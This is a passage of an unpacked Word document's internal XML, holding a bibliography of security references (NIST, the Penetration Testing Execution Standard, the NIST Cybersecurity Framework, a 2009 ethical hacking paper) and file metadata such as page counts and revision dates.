            <b:Last>Scott Rose</b:Last>
            <b:First>et</b:First>
            <b:Middle>al.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Publisher>National Institute of Standards and Technology (NIST)</b:Publisher>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>PTE25</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{181686C7-C325-46DA-A45E-80C505DE7174}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Board</b:Last>
            <b:First>PTES</b:First>
            <b:Middle>Technical</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The Penetration Testing Execution Standard</b:Title>
    <b:ProductionCompany>Penetration Testing Execution Standard</b:ProductionCompany>
    <b:YearAccessed>2025</b:YearAccessed>
    <b:MonthAccessed>11</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>http://www.pentest-standard.org/</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nat18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{85F43D71-5693-410C-85A0-D90AFCFF71A1}</b:Guid>
    <b:Title>Framework for Improving Critical Infrastructure Cybersecurity (CSF)</b:Title>
    <b:Year>2018</b:Year>
    <b:ProductionCompany> U.S. Department of Commerce</b:ProductionCompany>
    <b:URL>https://www.nist.gov/cyberframework</b:URL>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(NIST)</b:Last>
            <b:First>National</b:First>
            <b:Middle>Institute of Standards and Technology</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>GVV</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{31A18351-AAE6-40FA-A7CB-0FC0E0AD4CBE}</b:Guid>
    <b:Title>Ethical Hacking and Security Audit</b:Title>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>G. V. V. N. B. Ranga</b:Last>
            <b:First>G.</b:First>
            <b:Middle>Srinivas, G. Krishna, A. S. A. Khan</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>International Journal of Computer Science and Network Security (IJCSNS)</b:JournalName>
    <b:Pages>240-244</b:Pages>
    <b:Volume>Vol. 9, No. 6, pp. 240-244</b:Volume>
    <b:Year>June,2009</b:Year>
    <b:URL>http://paper.ijcsns.org/07_book/200906/20090635.pdf</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C621A6D2-B4A9-4D5D-BFFF-745C4304C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31</Pages>
  <Words>5504</Words>
  <Characters>31376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ThinkPad</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <cp:lastPrinted>2025-11-20T07:55:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-23T03:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-17T13:48:00Z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2d2c50aa-3f13-4ac2-bc6d-ec127a3810ba</vt:lpwstr>
  </property>
</Properties>
</file>